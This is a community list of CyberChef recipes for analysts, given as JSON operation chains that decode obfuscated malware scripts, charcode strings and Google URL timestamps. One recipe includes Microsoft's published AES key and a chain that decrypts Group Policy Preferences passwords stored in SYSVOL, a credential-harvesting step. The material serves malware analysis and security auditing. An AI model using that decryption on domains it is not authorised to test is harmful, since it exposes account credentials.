A list of CyberChef recipes
For background see Twitter #cyberchef or https://bitofhex.com/2018/05/29/cyberchef/
Full credit to @GCHQ for producing the tool. See: https://gchq.github.io/CyberChef/
A very common scenario: extract Base64, inflate, beautify the code. You may need to then do further processing or dynamic analysis depending on the next stage.
Filename: ahack.bat
Sample: SHA256 cc9c6c38840af8573b8175f34e5c54078c1f3fb7c686a6dc49264a0812d56b54
[{"op":"Regular expression","args":["User defined","[a-zA-Z0-9+/=]{30,}",true,true,false,false,false,false,"List matches"]},{"op":"From Base64","args":["A-Za-z0-9+/=",true]},{"op":"Raw Inflate","args":[0,0,"Adaptive",false,false]},{"op":"Generic Code Beautify","args":[]}]
CyberChef won't be able to handle all types of Invoke-Obfuscation, but here is one that can be decoded.
Filename: Acknowledgement NUT-95-52619.eml
Sample: SHA256 1240695523bbfe3ed450b64b80ed018bd890bfa81259118ca2ac534c2895c835
[{"op":"Find / Replace","args":[{"option":"Regex","string":"\^|\\|-|_|\/|\s"},"",true,false,true,false]},{"op":"Reverse","args":["Character"]},{"op":"Generic Code Beautify","args":[]},{"op":"Find / Replace","args":[{"option":"Simple string","string":"http:"},"http://",true,false,true,false]},{"op":"Extract URLs","args":[false]},{"op":"Defang URL","args":[true,true,true,"Valid domains and full URLs"]}]
Malware and scripts often use Charcode to represent characters in order to evade from AV and EDR solutions. CyberChef eats this up.
Source: https://gist.github.com/jonmarkgo/3431818
[{"op":"Regular expression","args":["User defined","([0-9]{2,3}(,\s|))+",true,true,false,false,false,false,"List matches"]},{"op":"From Charcode","args":["Comma",10]},{"op":"Regular expression","args":["User defined","([0-9]{2,3}(,\s|))+",true,true,false,false,false,false,"List matches"]},{"op":"From Charcode","args":["Space",10]}]
When a new GPP is created, there’s an associated XML file created in SYSVOL with the relevant configuration data and if there is a password provided, it is AES-256 bit encrypted. Microsoft published the AES Key, which can be used to decrypt passwords store in: \\SYSVOL<DOMAIN>\Policies\
Credit: @cyb3rops
Source 1: https://twitter.com/cyb3rops/status/1036642978167758848
Source 2: https://adsecurity.org/?p=2288
[{"op":"From Base64","args":["A-Za-z0-9+/=",true]},{"op":"To Hex","args":["None"]},{"op":"AES Decrypt","args":[{"option":"Hex","string":"4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b"},{"option":"Hex","string":""},"CBC","Hex","Raw",{"option":"Hex","string":""}]},{"op":"Decode text","args":["UTF16LE (1200)"]}]
CyberChef can use labels to identify parts of the recipe and then loop back to perform operations multiple times. In this examples, there are 29 rounds of Base64 encoding which are extracted and decoded.
Credit: @pmelson
Source 1: https://pastebin.com/hmCPDnHs
Source 2: https://twitter.com/pmelson/status/1078776229996752896
[{"op":"Label","args":["top"]},{"op":"Regular expression","args":["User defined","[a-zA-Z0-9+/=]{30,}",true,true,false,false,false,false,"List matches"]},{"op":"From Base64","args":["A-Za-z0-9+/=",true]},{"op":"Raw Inflate","args":[0,0,"Adaptive",false,false]},{"op":"Jump","args":["top",28]},{"op":"Generic Code Beautify","args":[]}]
Google uses its own timestamp, I call ei time, which it embeds in the URL.
Source: https://bitofhex.com/2018/05/29/cyberchef/
[{"op":"From Base64","args":["A-Za-z0-9-_=",true]},{"op":"To Hex","args":["None"]},{"op":"Take bytes","args":[0,8,false]},{"op":"Swap endianness","args":["Hex",4,true]},{"op":"From Base","args":[16]},{"op":"From UNIX Timestamp","args":["Seconds (s)"]}]
Example of loops over Base64: (Credit: @QW5kcmV3) https://twitter.com/QW5kcmV3/status/1079095274776289280
Example of multi-stage obfuscation (Credit: @JohnLaTwC) https://twitter.com/JohnLaTwC/status/1062419803304976385
Happy to add (and learn) more.
Please include original source of text and recipe developer (if not yourself). For consistency in pasting into CyberChef I have found the best results are to export the function as compact JSON.